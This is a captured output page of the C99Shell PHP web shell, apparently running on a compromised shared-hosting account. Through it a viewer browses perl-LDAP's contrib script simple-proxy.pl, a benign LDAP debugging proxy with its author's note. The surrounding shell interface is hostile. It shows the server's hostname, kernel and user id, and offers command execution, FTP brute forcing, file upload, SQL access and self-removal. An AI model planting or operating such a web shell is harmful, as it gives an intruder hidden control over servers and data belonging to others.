!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/share/doc/perl-LDAP/contrib/   drwxr-xr-x
Free 6181.71 GB of 6262.91 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     simple-proxy.pl (2.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Copyright (c) 2006 Hans Klunder <hans.klunder@bigfoot.com>. All rights reserved.
# This program is free software; you can redistribute it and/or
# modify it under the same terms as Perl itself.


use strict;
use warnings;

use IO::Select;
use IO::Socket;
use Data::Dumper;
use Convert::ASN1 qw(asn_read);
use Net::LDAP::ASN qw(LDAPRequest LDAPResponse);
our $VERSION = '0.1';
use fields qw(socket target);


sub handle($$)
{
  my $clientsocket = shift;
  my $serversocket = shift;

  # read from client
  asn_read($clientsocket, my $reqpdu);
  log_request($reqpdu);

  # send to server
  print $serversocket $reqpdu or die "Could not send PDU to server\n";

  # read from server
  my $ready;
  my $sel = IO::Select->new($serversocket);
  for( $ready = 1 ; $ready ; $ready = $sel->can_read(0)) {
    asn_read($serversocket, my $respdu) or return 1;
    log_response($respdu);
    # and send the result to the client
    print $clientsocket $respdu;
  }

  return 0;
}


sub log_request($)
{
  my $pdu = shift;

  print '-' x 80,"\n";
  print "Request ASN 1:\n";
  Convert::ASN1::asn_hexdump(\*STDOUT,$pdu);
  print "Request Perl:\n";
  my $request = $LDAPRequest->decode($pdu);
  print Dumper($request);
}


sub log_response($)
{
  my $pdu = shift;

  print '-' x 80,"\n";
  print "Response ASN 1:\n";
  Convert::ASN1::asn_hexdump(\*STDOUT,$pdu);
  print "Response Perl:\n";
  my $response = $LDAPResponse->decode($pdu);
  print Dumper($response);
}


sub run_proxy($$)
{
  my $listenersock = shift;
  my $targetsock = shift;

  return unless ($listenersock && $targetsock);

  my $sel = IO::Select->new($listenersock);
  my %Handlers;
  while (my @ready = $sel->can_read) {
    foreach my $fh (@ready) {
      if ($fh == $listenersock) {
    # let's create a new socket
    my $psock = $listenersock->accept;
    $sel->add($psock);
      } else {
    my $result = handle($fh,$targetsock);
    if ($result) {
      # we have finished with the socket
      $sel->remove($fh);
      $fh->close;
      delete $Handlers{*$fh};
    }
      }
    }
  }
}


my $listenersock = IO::Socket::INET->new(
    Listen => 5,
    Proto => 'tcp',
    Reuse => 1,
    LocalPort => 7070 )
  or  die "Could not create listener socket: $!\n";


my $targetsock = IO::Socket::INET->new(
      Proto => 'tcp',
      PeerAddr => 'localhost',
      PeerPort => 8080 )
  or  die "Could not create connection to server: $!\n";

run_proxy($listenersock,$targetsock);

1;

__END__


Hi,

I noticed in the TODO that there was a request for a simple proxy which
can act as a man-in-the-middle.

Well, the attached script provides such a proxy, it is really a simple
proxy as it can currently handle only one client at the time, it will
dump requests and responses to STDOUT both in ASN1 and as perl structure.

Cheers,

Hans
ps. If you need a little more power like returning entries on a query I
suggest to have a look at Net::LDAP::Server on CPAN.

# EOF

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0114 ]--